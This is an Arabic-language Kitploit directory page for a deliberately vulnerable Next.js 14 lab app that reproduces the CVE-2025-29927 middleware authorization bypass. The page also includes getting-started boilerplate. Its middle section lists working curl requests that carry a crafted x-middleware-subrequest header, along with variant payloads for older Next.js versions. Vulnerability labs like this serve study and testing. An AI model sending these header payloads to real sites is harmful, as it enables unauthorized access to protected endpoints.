Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
vulnerable-nextjs-14-CVE-2025-29927 — لا تستخدم. ضعيف | Kitploit
أدوات/GitHubGitHub/adjscent/vulnerable-nextjs-14-cve-2025-29927
المصادقة والترخيصتحليل الثغرات الأمنيةاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليممختبرات وتدريب عملي
GitHubadjscent/vulnerable-nextjs-14-cve-2025-29927

vulnerable-nextjs-14-CVE-2025-29927

لا تستخدم. ضعيف

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
عرض المستودع
5منذ 11 أشهرلم تتم المراجعة بعد

استنساخ تجاوز التصريح CVE-2025-29927

يحتوي هذا المستودع على استنساخ لثغرة CVE-2025-29927 في الحزمة next

كيفية الاستنساخ

  1. اتبع الخطوات أدناه لاستنساخ وتشغيل تطبيق Next.js
  2. اختبر أن التصريح يمنع الوصول إلى نقطة النهاية /api/hello
root@kitploit:~
$ curl http://localhost:3000/api/hello

{"error":"Unauthorized"}%
  1. اختبر أن التصريح يعمل عند تقديم الرمز المميز
root@kitploit:~
$ curl -H "Authorization: my-jwt-token-here" http://localhost:3000/api/hello

{"message":"Hello World"}%
  1. يمكن الآن تجاوزها أيضًا إذا قمنا بتداخل middleware 5 مرات في الرأس الخاص x-middleware-subrequest:
root@kitploit:~
curl -H "x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware" http://localhost:3000/api/hello

{"message":"Hello, World"}

استغلال CVE-2025-29927 لإصدارات Next.js الأقدم

كانت إصدارات Next.js 12 و 13 تستخدم اصطلاح تسمية مختلفًا لملف الوسيطة (_middleware.js)، والذي تم تغييره إلى middleware.js في Next.js 14. يمكن استغلال هذه الثغرة في الإصدارات الأقدم باستخدام ملف _middleware.js.

على سبيل المثال، ستكون الحمولات التالية قابلة للتطبيق، حسب إصدار Next.js واصطلاح التوجيه الخاص بك:

  • curl -H "x-middleware-subrequest: middleware" http://localhost:3000/api/hello (لإصدارات Next.js 12.2 مع ملف middleware.js في جذر التطبيق، وليس داخل دليل pages)
  • curl -H "x-middleware-subrequest: src/middleware" http://localhost:3000/api/hello
  • curl -H "x-middleware-subrequest: _middleware" http://localhost:3000/api/hello (لإصدارات Next.js 11 وحتى 12.2)
  • curl -H "x-middleware-subrequest: pages/_middleware" http://localhost:3000/api/hello
  • curl -H "x-middleware-subrequest: pages/admin/_middleware" http://localhost:3000/api/hello

البدء

أولاً، قم بتشغيل خادم التطوير:

root@kitploit:~
npm run dev
# or
yarn dev
# or
pnpm dev
# or
bun dev

افتح http://localhost:3000 في متصفحك لرؤية النتيجة.

يمكنك البدء في تعديل الصفحة عن طريق تعديل app/page.js. يتم تحديث الصفحة تلقائيًا عند تعديل الملف.

يستخدم هذا المشروع next/font لتحسين وتحميل خط Geist تلقائيًا، وهو عائلة خطوط جديدة لـ Vercel.

تعلم المزيد

لمعرفة المزيد عن Next.js، ألق نظرة على الموارد التالية:

  • وثائق Next.js - تعرف على ميزات Next.js وواجهة برمجة التطبيقات.
  • تعلم Next.js - برنامج تعليمي تفاعلي لـ Next.js.

يمكنك الاطلاع على مستودع Next.js على GitHub – ملاحظاتك ومساهماتك مرحب بها!

النشر على Vercel

أسهل طريقة لنشر تطبيق Next.js الخاص بك هي استخدام منصة Vercel من صناع Next.js.

اطلع على وثائق نشر Next.js لمزيد من التفاصيل.

تنزيل الأداة